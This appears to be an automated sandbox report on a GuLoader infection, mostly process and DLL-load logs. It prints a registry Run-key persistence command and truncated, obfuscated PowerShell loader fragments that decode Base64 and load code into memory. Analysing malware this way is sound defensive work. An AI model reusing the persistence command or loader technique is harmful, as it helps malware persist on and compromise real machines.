        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"Jump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbV source: powershell.exe, 0000000B.00000002.2871144100.00000000074DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5T source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn[ source: powershell.exe, 0000000B.00000002.2871144100.00000000074AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, xcopy.exe
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2871144100.00000000074E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: xcopy.pdb source: wab.exe

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';", "0")
        Yara detected GuLoader
        Source: Yara matchFile source: 0000000B.00000002.2879459016.000000000CE4E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2879301889.0000000008910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2868524375.0000000005C62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fredsbevaegelse133)$global:Pelsdyrfarm = [System.Text.Encoding]::ASCII.GetString($Incoalescence)$global:Sildefiskerne=$Pelsdyrfarm.substring(319853,28417)<#ricin Prsenteret Slagterbn
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Stenksers $Reliefskrift $Indicatives), (Sleddings @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trktjers = [AppDomain]::CurrentDomain.GetAssemblies()$glo
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Egenlige)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Supporteres, $false).DefineType($feriekolonierne
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Fredsbevaegelse133)$global:Pelsdyrfarm = [System.Text.Encoding]::ASCII.GetString($Incoalescence)$global:Sildefiskerne=$Pelsdyrfarm.substring(319853,28417)<#ricin Prsenteret Slagterbn
        Suspicious powershell command line found
